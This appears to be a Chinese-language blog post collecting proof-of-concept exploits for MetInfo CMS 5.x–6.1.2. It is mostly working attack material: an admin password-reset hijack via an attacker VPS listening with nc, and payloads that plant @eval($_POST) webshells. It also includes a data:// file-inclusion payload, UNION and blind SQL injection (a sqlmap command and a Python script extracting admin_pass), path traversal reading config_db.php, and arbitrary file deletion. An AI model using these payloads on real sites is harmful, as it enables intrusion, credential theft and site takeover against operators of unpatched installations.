metinfo

某CMS 5.X版本 管理员密码重置漏洞

https://xz.aliyun.com/t/2097
poc:
在vps上监听80端口

nc -lvv -p 80

访问后台登陆,重置密码 在填入管理员密码或邮箱后,抓包修改数据:在post数据后面 添加&met_fd_port=12345&met_host=vps的ip地址


forward后,访问反弹到vps的链接

即可重置管理员密码

某CMS 5.X版本GETSHELL漏洞合集

0x02 后台CVE-2017-11347补丁绕过继续Getshell

查找绝对路径的方法:

用安装目录下的phpinfo文件: /install/phpinfo.php
利用报错信息(信息在HTML注释中,必须通过查看网页源码的方式才能获取内容,否则看上去是空白页)

/app/system/include/public/ui/admin/top.php
/app/system/include/public/ui/admin/box.php
/app/system/include/public/ui/web/sidebar.php
```
poc:
第一步,新建1.ico文件,内容为:<?php phpinfo();?>
在后台"地址栏图标"处上传该文件。
得到地址为:http://localhost/upload/201810/1539949959.ico
![](../../images/cms/metinfo4.png)
第二步,发送如下payload(注意左斜杠和右斜杠不能随意更改):
```bash
http://localhost/某CMS/admin/app/physical/physical.php?action=op&op=3&valphy=test|/..\upload/201810/1539949959.ico/..\..\..\某CMS\about\shell.php|1


生成地址shell地址

http://localhost/某CMS/about/shell.php

这里生成成功但是,内容都被替换了,导致写入失败,有点疑惑?

0x04 后台olupdate文件缺陷导致Getshell

poc:
参数addr为生成shell的目录,生成shell的文件名sqlist.php不可控

192.168.0.6/metinfo531/admin/system/olupdate.php?action=sql&sqlfile=1&string=<script language="php">@eval($_POST[yesi])</script>&addr=12313&tableid=1000

执行后的shell地址:

192.168.0.6/metinfo531/admin/update/12313/sqlist.php

Metinfo5.3.10文件包含分析

https://paper.tuisec.win/detail/cad250641af3ec2

poc1:

条件allow_url_include 为on ,php5.2后默认为off

http://192.168.0.6/metinfo531/admin/login/login_check.php?langset=cn&depth=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw==

post:
action=login&login_name=123&login_pass=123&code=&Submit=%E7%99%BB%E5%BD%95&met_login_code=1

poc2:
利用协议攻击
看链接

Metinfo 5.3.17 前台SQL注入漏洞分析

https://www.leavesongs.com/PENETRATION/metinfo-5.3.17-sql-injection.html
poc:
访问:
index.php?lang=Cn&index=0000
头部添加:

X-Rewrite-Url: 1/2/404xxx' union select 1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from met_admin_table limit 1#/index.php

Metinfo 6.0.0 任意文件读取漏洞

https://paper.tuisec.win/detail/89cd63e5894ee07
poc尝试:

?dir=.....///http/.....///config/config_db.php
?dir=http/.....///.....///config/config_db.php
?dir=http\..\..\config\config_db.php

最终poc:

192.168.1.201/metinfo6/include/thumb.php?dir=http\..\..\config\config_db.php?dir=http\..\..\config\config_db.php

Metinfo 6.0.0任意文件删除

poc:

192.168.0.6/metinfo6/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/1.rar

metinfo5.31测试也行。试图删除install.lock 失败

Metinfo v6.0.0 getshell in background

文章中说可以成功,但在实践中发现$module = intval($module); 在6.0.0中多了intval取整,写入的一句话,被过滤掉了,导致写入失败,。 在5.3.1测试成功,其他版本自测。
https://www.kingkk.com/2018/06/Metinfo-v6-0-0-getshell-in-background/
poc:
登入后台,访问

192.168.1.201/metinfo531/admin/column/save.php?
name=123
&action=editor
&foldername=upload
&module=22;@eval($_POST[yesi]);/*

可在/upload/index.php中写入@eval($_POST[yesi]);

[代码审计] MetInfo6.0.0漏洞集合(一)

https://bbs.ichunqiu.com/thread-43416-1-1.html

ox01后台sql注入

python sqlmap.py -u "192.168.1.201/metinfo6/admin/index.php?lang=cn&anyid=&n=feedback&c=feedback_admin&a=doexport&class1=&met_fd_export=-1&check_id=1" --cookie "cookie" -p check_id --dbms=mysql –-dbs

Metinfo 6.1.2 SQL注入

https://bbs.ichunqiu.com/thread-46687-1-1.html
脚本中的sql根据情况而定。
poc:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2018-10-20 14:54:00
# @Author : yeSi (you@example.org)
# @Link : http://example.org
# @Version : $Id$

import requests
import string
url="http://192.168.0.6/metinfo612/admin/index.php?m=web&n=message&c=message&a=domessage&action=add&lang=cn&para137=1&para186=1&para138=1&para139=1&para140=1&id=42 "
chars="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ "
test=0
flag=''
for i in range(33):
if test==1:
break
for j in chars:
sql="and ascii(substr((select group_concat(admin_id,admin_pass) from met_admin_table limit 0,1),{0},1)) ={1}".format(i+1,ord(j))
# sql="and ascii(substr((select admin_id from met_admin_table limit 0,1),{0},1)) ={1}".format(i+1,ord(j))
payload=url+sql
r=requests.get(payload)
if '验证码错误' in r.content:
flag+=j
print flag
break
if j==chars[-1]:
test=1
print 'flag is :',flag

当前网速较慢或者你使用的浏览器不支持博客特定功能,请尝试刷新或换用Chrome、Firefox等现代浏览器